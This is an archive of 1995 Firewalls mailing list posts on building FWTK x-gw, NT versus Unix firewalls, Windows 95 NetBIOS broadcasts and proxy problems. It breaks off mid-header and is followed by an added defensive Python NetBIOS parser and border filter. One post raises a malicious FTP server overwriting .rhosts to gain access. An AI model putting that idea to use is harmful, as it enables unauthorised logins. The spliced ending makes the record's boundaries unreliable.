+-------------------------------------------+---------------------------------+

From firewalls-owner Wed May 17 17:26:05 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02570 for firewalls-outgoing; Wed, 17 May 1995 16:42:13 -0700
Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA02563 for ; Wed, 17 May 1995 16:42:08 -0700
Received: by Disclosure.COM (4.1/SMI-4.1) id AA15380; Wed, 17 May 95 19:43:58 EDT
Date: Wed, 17 May 1995 19:43:57 -0400 (EDT)
From: Scott Barman
To: Darin Okuyama
Cc: Firewall Mailing List
Subject: Re: building x-gw ..
In-Reply-To: <199505172258.PAA05315@netcom23.netcom.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 17 May 1995, Darin Okuyama wrote:
>
> I am trying to build "x-gw" on a Sun running SunOS 4.1.3, and
> I get the following error:
>
> cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \
> -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv
>
> ld: Undefined symbol
> _get_wmShellWidgetClass
> _get_applicationShellWidgetClass
>
> Am I missing a library? Or are they in the wrong order?

I think you are missing a library. If I remember back to my Motif programming days, I think those are specific to Motif. To get those you need "-lXm" on the command line--but you don't have the libXm.a (Motif) libraries since you're running OpenWindoze (and Sun is supposed to be CDE compliant! yea... right!). You may have to do some hackin'!

I've never built FWTK's x-gw on a Sun.
I wonder if these are required?

Just did a quick perusal of the OW libraries (using nm under SunOS 4.1.3_U1). They are not there. That *almost* confirms to me they are from Motif.

Good luck!

scott barman
scott@disclosure.com

From firewalls-owner Wed May 17 17:32:06 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03423 for firewalls-outgoing; Wed, 17 May 1995 17:16:04 -0700
Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA03418 for ; Wed, 17 May 1995 17:16:00 -0700
Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id UAA28946 for ; Wed, 17 May 1995 20:14:34 -0400
Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id sma028936; Wed May 17 20:13:41 1995
Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id UAA11624 for ; Wed, 17 May 1995 20:11:23 -0400
Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 20:16:28 +1100
Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 20:15:56 +1100
From: "ANNA M. KING"
Organization: New York State Insurance Fund
To: firewalls@GreatCircle.com
Date: Wed, 17 May 1995 20:15:52 EST
Subject: Re: Packet filtering for NT firewall
Priority: normal
X-mailer: Pegasus Mail/Windows (v1.22)
Message-ID:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> On Wed, 17 May 1995, SCOTT BARMAN wrote:
> Is Unix overkill because you don't know it or because you're mandated
> to use NT? This is in no way a cut down, but understanding your
> situation may help in giving advice.
>

No, it's not a mandate that I use NT or that I am unfamiliar with Unix; I have set up a firewall between my network and the Internet on a SUN Sparc20 with all software obtained from off the network.
If this only involved my network I would stick with Unix, but I am also supposed to help the other side set up a similar configuration; firewall, CISCO router, etc. They are not familiar with Unix and complain about not having the time and resources to learn a new OS; also they would like this project completed in approximately a month's time.

> The Fact of the matter is there is nothing out there for NT to use in
> this matter. The concept of proxy servers, filters, and screeners,
> which is what you will need to do monitoring, etc., does not exist in
> this world. Even M$ does not have it--and I asked.
>
> If you find something, I would be interested in hearing about it since
> my customers are interested. However, until NT grows up and becomes
> a real operating system, I just don't see this as a part of that system.
> Sorry.

This being the case, after looking around for the last couple of weeks I have no choice but to go with a Unix solution. Since I am familiar with Linux I'll probably use that.

Thanks for the info. If I ever find something I'll let you know.

Anna M. King, Sr.
Programmer/Analyst
New York State Insurance Fund
amk@ds_svr1.sif.state.ny.us
(212) 312-9005

From firewalls-owner Wed May 17 17:54:11 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02507 for firewalls-outgoing; Wed, 17 May 1995 16:41:02 -0700
Received: from s5.math.umn.edu (s5.math.umn.edu [128.101.154.105]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA03561 for ; Tue, 16 May 1995 19:02:52 -0700
From: riordan@math.umn.edu
Received: from erasmus.math.umn.edu by s5.math.umn.edu; Tue, 16 May 1995 21:02:27 -0500
Date: Tue, 16 May 1995 21:02:10 -0500
Message-Id: <199505170202.VAA02966@erasmus.math.umn.edu>
Received: by erasmus.math.umn.edu; Tue, 16 May 1995 21:02:10 -0500
To: firewalls@greatcircle.com
Subject: Re: Monitoring outgoing traffi
Reply-to: riordan@geom.umn.edu
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ron DuFresne says:

> A company policy that outlines how sensitive data is to be
> transmitted, good user training, and a strongly skilled user help
> desk/support department are the keys to keeping sensitive data out of
> the hands of those it is meant not for...not a 'big-brother' mentality.

I do not know about settings other than academia but.. here it is often the case that sensitive data are leaked as a result of incorrectly exported insensitive data. I suppose that while monitoring outgoing traffic for deliberately and maliciously exported data would be infeasible, such monitoring might reduce the number of accidental breaches.

As a tangent I tend to worry about imported data. I do not find many people really think about the methods associated with various data formats. I do not think, as examples, that TeX and Postscript are generally regarded as the full languages w/ file io that they are. I am scared even to think about Morris/fingerd type attacks on other data formats.
No firewall is going to prevent users from accidentally opening holes by not anticipating the result of some configuration issue. I do not think it is even an issue of being naive: how often have we found a gaping new sendmail hole?

regards,
--
james
riordan@geom.umn.edu http://www.math.umn.edu/~riordan

From firewalls-owner Wed May 17 18:37:12 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA04506 for firewalls-outgoing; Wed, 17 May 1995 18:07:50 -0700
Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA04501 for ; Wed, 17 May 1995 18:07:46 -0700
Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id SAA01010; Wed, 17 May 1995 18:04:51 -0700
Received: from ilinx(192.197.176.225) by tera via smap (V1.3) id sma001008; Wed May 17 18:04:35 1995
Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Wed, 17 May 95 18:02 PDT
Message-Id:
From: brian@ilinx.ilinx.com (Brian J. Murrell)
To: avalon@coombs.anu.edu.au
Subject: Re[2]: Packet filtering for NT firewall
Cc: AMK@dssvr1.sif.state.ny.us, firewalls@GreatCircle.com
Date: Wed, 17 May 1995 18:02:25 -0700 (PDT)
MIME-Version: 1.0
X-Mailer: Ishmail 1.0.5-386-950210 Available via anonymous ftp from ftp.halsoft.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

from the quill of Darren Reed on scroll <199505172218.PAA00360@miles.greatcircle.com>

> NT is all blackbox material. I suspect that unless you're someone
> called Microsoft, you would have no chance of writing firewall s/w
> for NT.

I agree completely. There are a few other things about NT for firewalls that bother me. First, there aren't enough out there in high-profile sites for me to believe that it's been water-tested yet. The last thing I want is to be known for the first NT firewall on the 'net to be broken into. Second, NT is a single vendor solution.
When a security bug is found in UNIX there is motivation to disclose it to the market. The vendor that finds, fixes and announces it first looks better than the rest for finding it, and he must be quick about it so as not to get skunked by the other UNIX vendors. That type of competitive motivation just does not exist in the NT market.

b.
--
Brian J. Murrell                        brian@ilinx.com
InterLinx Support Services, Inc.        brian@wimsey.com
North Vancouver, B.C.                   604 983 UNIX
Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD

From firewalls-owner Wed May 17 19:00:04 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA04520 for firewalls-outgoing; Wed, 17 May 1995 18:09:30 -0700
Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA04508 for ; Wed, 17 May 1995 18:09:13 -0700
Received: from lordmuck.itd.uts.edu.au. by sequoia.itd.uts.EDU.AU with SMTP id AA07586 (5.65c/IDA-1.4.4 for ); Thu, 18 May 1995 11:08:32 +1000
Received: (from matt@localhost) by lordmuck.itd.uts.edu.au. (8.6.12/Jas 1.1) id LAA29280; Thu, 18 May 1995 11:08:49 +1000
From: Jas (Matthew K)
Message-Id: <199505180108.LAA29280@lordmuck.itd.uts.edu.au.>
Subject: Re: building x-gw ..
To: scott@disclosure.com (Scott Barman)
Date: Thu, 18 May 1995 11:08:48 +1000 (EST)
Cc: okuyama@netcom.com, firewalls@greatcircle.com
In-Reply-To: from "Scott Barman" at May 17, 95 07:43:57 pm
X-Gc: GCV 2.1 GAT/M/CS d--(-+) H-- s++:-- g+ p? !au a-(?) w+++ v+ C+++$
X-Gc: UVS++++$ P+>+++ L- 3+++ E-(++) N++ K W--- M+ V-- -po+(+) Y+ t+
X-Gc: !5++ jx R+ G?
      !tv b+++ D++ B e+ u--(**) h- f+(*) r n- !y
X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 416 5722
X-Pager: +61 2 214 1111 #849482
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1703
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Scott Barman wrote this...
>
> On Wed, 17 May 1995, Darin Okuyama wrote:
>
> > I am trying to build "x-gw" on a Sun running SunOS 4.1.3, and
> > I get the following error:
> >
> > cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \
> >     -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv
> >
> > ld: Undefined symbol
> >    _get_wmShellWidgetClass
> >    _get_applicationShellWidgetClass
> >
> > Am I missing a library? Or are they in the wrong order?
>
> I think you are missing a library. If I remember back to my Motif
> programming days, I think those are specific to Motif. To get those
> you need "-lXm" on the command line--but you don't have the libXm.a
> (Motif) libraries since you're running OpenWindoze (and Sun is
> supposed to be CDE compliant! yea... right!). You may have to do
> some hackin'!
>
> I've never built FWTK's x-gw on a Sun. I wonder if these are required?
>

just thought i'd drop in this point here, so no more misconceptions float around on this matter. it is a bug in the dynamic loader that causes this bug from memory.. it is not a problem with Motif or Openlook or anything.. the sunos faq should have a work around for this, i can't remember the exact semantics of it, but basically it involves statically linking instead of dynamic linking..

Matt
--
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan, Systems Programmer
Information Technology Division
University of Technology Sydney, Australia

It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is.
	-- Rob Pike

From firewalls-owner Wed May 17 19:08:16 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA05025 for firewalls-outgoing; Wed, 17 May 1995 18:30:43 -0700
Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.84.252]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA05020 for ; Wed, 17 May 1995 18:30:39 -0700
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id UAA22615 for GreatCircle.COM!firewalls; Wed, 17 May 1995 20:09:36 -0500
Received: by ris1.nmti.com (smail2.5) id AA07884; 17 May 95 18:33:10 CDT (Wed)
Received: by sonic.nmti.com; id AA13658; Wed, 17 May 1995 18:54:29 -0500
From: peter@nmti.com (Peter da Silva)
Message-Id: <9505172354.AA13658@sonic.nmti.com.nmti.com>
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)
To: isdmill@gatekeeper.ddp.state.me.us (David Miller)
Date: Wed, 17 May 1995 18:54:28 -0500 (CDT)
Cc: jcmurphy@smurfland.cit.buffalo.edu, maillet@doc.usmcs.maine.edu, firewalls@GreatCircle.COM
In-Reply-To: from "David Miller" at May 17, 95 08:58:46 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 100
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Most of these files are likely to cause problems if they're just overwritten, but how about .rhosts?
From firewalls-owner Wed May 17 21:01:24 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA07563 for firewalls-outgoing; Wed, 17 May 1995 20:50:40 -0700
Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA07557 for ; Wed, 17 May 1995 20:50:36 -0700
Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id UAA03913; Wed, 17 May 1995 20:35:22 -0700
Date: Wed, 17 May 1995 20:35:21 -0700 (PDT)
From: Tim Keanini
To: firewalls@greatcircle.com
Subject: WIN95 and UDP 137 and 138
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have solved a mystery on one of my internal networks. I would like to share it with you all:

If you install the Windows 95 package, there are these broadcasted UDP packets that are on src and dst port 137 and 138 UDP. From what I have gathered, it is Windows 95 trying to tunnel NETBIOS via UDP.

Just wanted to share.

--blast

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\ Tim Keanini   |  "The limits of my language,                       /
/   aka blast   |   are the limits of my world."                     \
\               |        --Ludwig Wittgenstein                        /
/               |                                                     \
\               +================================================/
/ for more info on BayMOO...
                                                                      \
\   email baymoo@worldbit.com                                         /
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Wed May 17 21:31:16 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA08343 for firewalls-outgoing; Wed, 17 May 1995 21:12:22 -0700
Received: from ix5.ix.netcom.com (ix5.ix.netcom.com [199.182.120.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA08333 for ; Wed, 17 May 1995 21:12:19 -0700
Received: from by ix5.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id VAA29506; Wed, 17 May 1995 21:11:32 -0700
Date: Wed, 17 May 1995 21:11:32 -0700
Message-Id: <199505180411.VAA29506@ix5.ix.netcom.com>
From: mlebied@ix.netcom.com (Michael Lebiedzinski)
Subject: NNTP through ANS Interlock
To: firewalls@greatcircle.com
Cc: MCCFWC01.MLEBIEDZ/G=Michael/S=Lebiedzinski/O=JNJ/DD=MCCFWC01.MLEBIEDZ@mhs-jnj.attmail.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We have a rule set up for port 119 (NNTP) to allow connections. We are trying to use Netscape 1.1N to get USENET through the Interlock. Anyone know what to enter for:

1. News_Proxy
2. News_ProxyPort
3. NNTP server

We do not archive news on the firewall. Is there anything else about this I should know?

When I assign News_Proxy to the IP addr of the firewall, News_ProxyPort to 119 and the NNTP server to ixnews1.ix.netcom.com, I get a generic message from interserv.net and no news.

Any information would be helpful. Please send to mlebied@ix.netcom.com and I'll summarize.
Thanks,
Michael

From firewalls-owner Wed May 17 22:02:04 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA09036 for firewalls-outgoing; Wed, 17 May 1995 21:33:56 -0700
Received: from merlin.resmel.bhp.com.au (merlin.resmel.bhp.com.au [134.18.1.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA09021 for ; Wed, 17 May 1995 21:33:24 -0700
Received: from alpha (alpha.itwhy.bhp.com.au [134.18.56.252]) by merlin.resmel.bhp.com.au (8.6.11/8.6.11) with ESMTP id EAA03034 for ; Thu, 18 May 1995 04:32:25 GMT
Received: from localhost (andrewp@localhost) by alpha (8.6.4/8.6.4) id OAA21893 for Firewalls@GreatCircle.COM; Thu, 18 May 1995 14:02:21 +0930
From: Andrew Prusek
Message-Id: <199505180432.OAA21893@alpha>
Subject: Re: FTP from Netscape problem (fwd)
To: Firewalls@GreatCircle.COM
Date: Thu, 18 May 1995 14:02:16 +0930 (CST)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2022
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The following was sent to me instead of the whole list..

> From bin Thu May 18 13:09:11 1995
> Date: Wed, 17 May 1995 21:11:23 -0600
> From: mcknight@bullwinkle.scccc.com (Michael McKnight)
> Message-Id: <9505172111.ZM2986@bullwinkle.scccc.com>
> In-Reply-To: Andrew Prusek
>         "Re: FTP from Netscape problem" (May 18, 11:13am)
> References: <199505180143.LAA20583@alpha>
> Reply_To: mcknight@scccc.com
> X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail)
> To: Andrew Prusek
> Subject: Re: FTP from Netscape problem
> Mime-Version: 1.0
> Content-Type: text/plain; charset=us-ascii
>
> It is obvious by the number of responses that I am the only one that
> didn't know to use the http-gw proxy. Thanks all.
>
> I tried setting my ftp proxy to use the http-gw proxy and it
> WORKS...sometimes.
> Two things I notice:
>
> 1) when my password is sent, it is sent as -gopher@boris.scccc.com; I don't
> really care as long as it works but what's up with that.
>
> 2) It doesn't always work...more often than not I get a screen with the
> words: FTP Error 404 Requested information not available. I realize that
> sometimes I would get this because the service is unavailable, too many
> anonymous users, but I have tried this with some services that I know
> are available. Any clues?
>
> TIA.
>
>
> --
> Michael McKnight              email: mcknight@scccc.com
> SCC Communications Corp.      Phone: (303) 581-5601
> 6285 Lookout Road             Fax  : (303) 581-0900
> Boulder, CO 80301-3343
>

--
Andrew PRUSEK                       Phone: +61 86 40 4881
BHP Information Technology          Fax:   +61 86 40 4760
PO Box 21 / Port Augusta Road       Email: andrewp@itwhy.bhp.com.au
Whyalla SA 5600                     Preferred OS: Linux
Australia
Disclaimer: My opinions are my own!
Witty Saying: Common sense is not that common!

From firewalls-owner Thu May 18 01:01:36 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA11672 for firewalls-outgoing; Thu, 18 May 1995 00:37:12 -0700
Received: from office.un.kiev.ua (office.un.kiev.ua [194.44.144.150]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA11658 for ; Thu, 18 May 1995 00:37:01 -0700
Received: (from scorp@localhost) by office.un.kiev.ua (8.6.12/0409) id KAA07713; Thu, 18 May 1995 10:35:12 +0300
Date: Thu, 18 May 1995 10:35:11 +0300 (EET DST)
From: Slava Kritov
X-Sender: scorp@office.un.kiev.ua
To: Andrew Prusek
cc: Firewalls@GreatCircle.COM
Subject: Re: FTP from Netscape problem (fwd)
In-Reply-To: <199505180432.OAA21893@alpha>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi !

On Thu, 18 May 1995, Andrew Prusek wrote:

> > 2) It doesn't always work...more often than not I get a screen with the
> > words: FTP Error 404 Requested information not available.
> > I realize that
> > sometimes I would get this because the service is unavailable, too many
> > anonymous users, but I have tried this with some services that I know
> > are available. Any clues?

Even more - in a situation where you have several caching CERN httpd's linked together through some firewalling mechanisms, it often just drops the connection without finishing all the job. Quite distracting, actually. But I think this is mostly because of the way any CERN httpd implements proxying/caching (I even contacted Ari Luotonen on that topic ;) So I don't think there's much firewall-involved stuff ...

Best
Slava

From firewalls-owner Thu May 18 01:23:58 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA11630 for firewalls-outgoing; Thu, 18 May 1995 00:33:30 -0700
Received: from office.un.kiev.ua (office.un.kiev.ua [194.44.144.150]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA11625 for ; Thu, 18 May 1995 00:33:01 -0700
Received: (from scorp@localhost) by office.un.kiev.ua (8.6.12/0409) id KAA07662; Thu, 18 May 1995 10:31:10 +0300
Date: Thu, 18 May 1995 10:31:09 +0300 (EET DST)
From: Slava Kritov
X-Sender: scorp@office.un.kiev.ua
To: Tim Keanini
cc: firewalls@greatcircle.com
Subject: Re: WIN95 and UDP 137 and 138
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi !

On Wed, 17 May 1995, Tim Keanini wrote:

>
> I have solved a mystery on one of my internal networks.
> I would like to share it with you all:
>
> If you install the Windows 95 package, there are these broadcasted UDP
> packets that are on src and dst port 137 and 138 UDP. From what I
> have gathered, it is Windows 95 trying to tunnel NETBIOS via UDP.

Not only Windows 95, but also WfW with the TCP protocol installed. One of the best solutions for file services in a network consisting of Unixes ( ces;) and WfW - samba - relies heavily on that ...
BTW from the point of security it's VERY good - I mean you don't need NFS, and you can easily block that kind of traffic from going in/out...

>
> Just wanted to share.

Just my 2 grivna's ( proposed, but not implemented Ukrainian currency - thus being truly virtual ;)

Best
Slava Kritov, Senior Internetwork Specialist
UN Internet Project in Ukraine

From firewalls-owner Thu May 18 02:31:28 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14258 for firewalls-outgoing; Thu, 18 May 1995 02:08:04 -0700
Received: from stroma.dcs.ed.ac.uk (stroma.dcs.ed.ac.uk [129.215.160.108]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14247 for ; Thu, 18 May 1995 02:07:56 -0700
Received: from staffin.dcs.ed.ac.uk by dcs.ed.ac.uk id aa29702; 18 May 95 10:06 BST
Newsgroups: cs-lists.firewalls
Path: langa.dcs.ed.ac.uk!gdmr
From: George Ross
Subject: Re: building x-gw ..
Message-Id:
Organization: Department of Computer Science, University of Edinburgh
X-Newsreader: xrn 7.03
References:
Distribution: cs
Date: Thu, 18 May 1995 09:06:15 GMT
Lines: 31
Apparently-To: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Jas (Matthew K) writes:
> > On Wed, 17 May 1995, Darin Okuyama wrote:
> > > cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \
> > >     -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv
> > >
> > > ld: Undefined symbol
> > >    _get_wmShellWidgetClass
> > >    _get_applicationShellWidgetClass
>
> just thought i'd drop in this point here, so no more misconceptions
> float around on this matter. it is a bug in the dynamic loader that
> causes this bug from memory.. it is not a problem with Motif or
> Openlook or anything.. the sunos faq should have a work around for
> this, i can't remember the exact semantics of it, but basically it
> involves statically linking instead of dynamic linking..

This is getting a bit off topic, but you have four options:

1) Ignore it. The thing will run anyway!
2) -Bstatic -lXmu -Bdynamic
3) Get Sun's patch 100573-xx (and maybe also 100512-xx)
4) Use the X11Rn libraries instead.

BTW, I think that "-lX" is bogus.
--
Dr George D M Ross, Department of Computer Science, University of Edinburgh
Kings Buildings, Mayfield Road, Edinburgh, Scotland, EH9 3JZ
Mail: gdmr@dcs.ed.ac.uk   Voice: +44 131 650 5147   Fax: +44 131 667 7209

From firewalls-owner Thu May 18 03:01:46 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14717 for firewalls-outgoing; Thu, 18 May 1995 02:47:33 -0700
Received: from beijing2.cernet.edu.cn (cernet.edu.cn [166.111.250.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14712 for ; Thu, 18 May 1995 02:47:24 -0700
Received: by beijing2.cernet.edu.cn (4.1/SMI-4.1) id AA01655; Thu, 18 May 95 17:48:34 CDT
Date: Thu, 18 May 95 17:48:34 CDT
From: yang@cernet.edu.cn (Yang Jia Hai)
Message-Id: <9505180848.AA01655@beijing2.cernet.edu.cn>
To: firewalls@GreatCircle.com
Subject: Problems :telnet with firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi, gentlemen,

I'm a beginner at firewalls. These days, I ftped a public domain firewall, which is maintained by Trusted Information Systems, Inc. I've installed it successfully. But as I configured it, the permit/deny mechanism for ftp is OK, but it doesn't work for TELNET. Although I put a permit rule for a specific host, this host just can't log into my firewall station. It seems that it just denies everything?!!

Can anyone give me a clue? Any suggestions would be appreciated. Thanks in advance.

Yang Jiahai, Dept. of Computer Science, Tsinghua Univ., Beijing, PRC.
Email address: yang@cernet.edu.cn

From firewalls-owner Thu May 18 03:31:42 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA15083 for firewalls-outgoing; Thu, 18 May 1995 03:04:51 -0700
Rece
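The UDP 137/138 broadcasts that Tim Keanini reports and Slava Kritov suggests blocking at the firewall are NetBIOS Name Service and Datagram Service traffic (RFC 1001/1002). The following is an added Python example, not code from any message in this thread: it encodes and decodes the "first-level" NetBIOS name format, parses a constructed name-query datagram the way a filter or sniffer would, and applies the border policy Slava describes (drop NetBIOS/UDP in either direction, leave LAN-internal broadcasts alone). The LAN range 192.0.2.0/24 and all packet contents are constructed placeholders.

```python
"""NetBIOS-over-UDP at the border: decode a Name Service (UDP 137) query and
decide whether a perimeter filter should drop the datagram.  Added example;
all sample data is constructed inline, and the LAN range is a placeholder."""
import struct
from ipaddress import ip_address, ip_network

NBNS_PORT = 137   # NetBIOS Name Service
NBDGM_PORT = 138  # NetBIOS Datagram Service
NETBIOS_UDP_PORTS = {NBNS_PORT, NBDGM_PORT}

# Constructed placeholder for the internal LAN (RFC 5737 documentation range).
INTERNAL_LAN = ip_network("192.0.2.0/24")


def encode_nb_name(name: str, suffix: int) -> bytes:
    """RFC 1001/1002 'first-level' encoding: the 15-byte space-padded name plus a
    one-byte suffix, each nibble written as a letter in 'A'..'P'."""
    raw = name.upper().encode("ascii").ljust(15, b" ")[:15] + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def decode_nb_name(encoded: bytes):
    """Reverse of encode_nb_name; returns (name, suffix) or raises ValueError."""
    if len(encoded) != 32 or any(c < 0x41 or c > 0x50 for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]


def build_nbns_query(name: str, suffix: int, trn_id: int = 0x1234) -> bytes:
    """Constructed broadcast NAME QUERY REQUEST (flags 0x0110: opcode 0, RD, B)."""
    header = struct.pack("!HHHHHH", trn_id, 0x0110, 1, 0, 0, 0)
    question = (b"\x20" + encode_nb_name(name, suffix) + b"\x00"
                + struct.pack("!HH", 0x0020, 0x0001))  # QTYPE NB, QCLASS IN
    return header + question


def parse_nbns(payload: bytes):
    """Parse the NBNS header and question section; None if malformed."""
    if len(payload) < 12:
        return None
    trn_id, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    questions = []
    pos = 12
    try:
        for _ in range(qdcount):
            if payload[pos] != 0x20:          # first label must be 32 bytes
                return None
            name, suffix = decode_nb_name(payload[pos + 1:pos + 33])
            pos += 33
            while payload[pos] != 0:          # skip optional scope labels
                pos += 1 + payload[pos]
            pos += 1                          # zero terminator
            qtype, _qclass = struct.unpack("!HH", payload[pos:pos + 4])
            pos += 4
            questions.append((name, suffix, qtype))
    except (IndexError, ValueError, struct.error):
        return None
    return {"trn_id": trn_id, "opcode": (flags >> 11) & 0xF,
            "broadcast": bool(flags & 0x0010), "questions": questions}


def border_verdict(src: str, dst: str, sport: int, dport: int):
    """NetBIOS/UDP has no business crossing the perimeter: drop it in both
    directions; leave LAN-internal broadcasts alone.  Returns (verdict, direction)."""
    if sport not in NETBIOS_UDP_PORTS and dport not in NETBIOS_UDP_PORTS:
        return ("allow", "n/a")
    inside_src = ip_address(src) in INTERNAL_LAN
    inside_dst = ip_address(dst) in INTERNAL_LAN
    if inside_src and not inside_dst:
        return ("drop", "outbound")
    if inside_dst and not inside_src:
        return ("drop", "inbound")
    return ("allow", "internal")


if __name__ == "__main__":
    pkt = build_nbns_query("WORKGROUP", 0x1D)        # constructed LAN broadcast
    print(parse_nbns(pkt))
    print(border_verdict("192.0.2.10", "192.0.2.255", 137, 137))
    print(border_verdict("192.0.2.10", "198.51.100.7", 137, 137))
```

The suffix byte (0x1D in the constructed query) is what distinguishes the roles a machine registers under one name, so a log that decodes it tells you which service is chattering; the verdict function deliberately keys on port in either direction, since the source port of these broadcasts is the same as the destination port.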